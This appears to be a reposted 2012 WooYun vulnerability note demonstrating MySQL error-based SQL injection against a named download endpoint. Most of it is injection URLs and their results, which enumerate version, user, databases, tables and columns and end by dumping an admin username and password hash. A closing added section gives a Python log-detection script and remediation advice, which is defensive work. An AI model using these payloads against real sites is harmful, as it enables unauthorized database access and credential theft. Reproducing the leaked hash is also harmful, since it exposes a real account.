
php+mysql advanced error-based injection, tested and working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had been looking for something to test this on and did not expect to find it here. It can be tested; this is just a note for the record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********step through the databases one by one with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********step through the table names one by one with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********step through the column names one by one with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361
/**********dump the data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
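For anyone reviewing web logs: every request in the post above has the same shape, count(*) together with floor(rand(0)*2) and group by, so it can be flagged in access logs even when URL-encoded more than once. The Python sketch below is an added example and not part of the original post; the function names, the signal list and the sample request targets are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Parts of the duplicate-key error pattern seen in the requests above.
SIGNALS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)"),
    "group_by": re.compile(r"group\s+by"),
    "info_schema": re.compile(r"information_schema\s*\."),
}
CORE = {"rand_floor", "count_star", "group_by"}
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(raw, max_rounds=3):
    """Undo nested URL encoding, drop /**/ comments, collapse whitespace, lowercase."""
    text = raw
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = INLINE_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).lower()

def classify(request_target):
    """Return (verdict, matched signal names) for one logged request target."""
    norm = normalize(request_target)
    hits = sorted(name for name, rx in SIGNALS.items() if rx.search(norm))
    if CORE <= set(hits):
        return "alert", hits      # full error-based pattern present
    if hits:
        return "review", hits     # partial match: worth a human look
    return "ok", hits

# Constructed sample request targets (host omitted), not real log data.
SAMPLES = [
    "/download/downpage/netarea/id/1600003/wapc/5000_0005_003",
    "/download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),"
    "concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables"
    "+group+by+x)a)%23/wapc/5000_0005_003",
    "/download/downpage/netarea/id/1600003%2527%2520OR%25201%253D(SELECT%25201"
    "%2520FROM(SELECT%2520COUNT(*),CONCAT(USER(),FLOOR(RAND(0)*2))x%2520FROM"
    "%2520information_schema.tables%2520GROUP/**/BY%2520x)a)%2523",
    "/help/sql?topic=group+by+examples",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target)[0], target[:60])
```

Detection of this kind only surfaces attempts; the fix on the application side is to bind the id value as a query parameter and to stop returning database error text to the client.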